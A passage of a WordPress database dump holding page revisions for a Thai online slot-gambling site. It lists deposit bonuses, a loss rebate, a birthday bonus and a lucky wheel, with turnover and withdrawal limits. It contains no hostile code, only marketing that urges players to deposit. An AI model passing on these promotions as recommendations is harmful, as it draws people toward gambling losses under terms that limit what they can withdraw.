ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:55:31','2025-10-23 07:55:31','',27,'https://megabet333.biz/?p=83',0,'revision','',0),(84,3,'2025-10-23 07:55:31','2025-10-23 07:55:31','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ naijan</strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\">naijan <strong data-start=\"2414\" data-end=\"2445\">ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:55:31','2025-10-23 07:55:31','',27,'https://megabet333.biz/?p=84',0,'revision','',0),(85,3,'2025-10-23 07:58:11','2025-10-23 07:58:11','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 07:58:11','2025-10-23 07:58:11','',16,'https://megabet333.biz/?p=85',0,'revision','',0),(86,3,'2025-10-23 07:58:12','2025-10-23 07:58:12','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 07:58:12','2025-10-23 07:58:12','',16,'https://megabet333.biz/?p=86',0,'revision','',0),(87,3,'2025-10-23 07:58:12','2025-10-23 07:58:12','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 07:58:12','2025-10-23 07:58:12','',16,'https://megabet333.biz/?p=87',0,'revision','',0),(88,3,'2025-10-23 08:01:44','2025-10-23 08:01:44','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:01:44','2025-10-23 08:01:44','',16,'https://megabet333.biz/?p=88',0,'revision','',0),(89,3,'2025-10-23 08:01:44','2025-10-23 08:01:44','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-23 08:01:44','2025-10-23 08:01:44','',16,'https://megabet333.biz/?p=89',0,'revision','',0),(90,3,'2025-10-23 08:01:44','2025-10-23 08:01:44','<img width=\"1200\" height=\"500\" 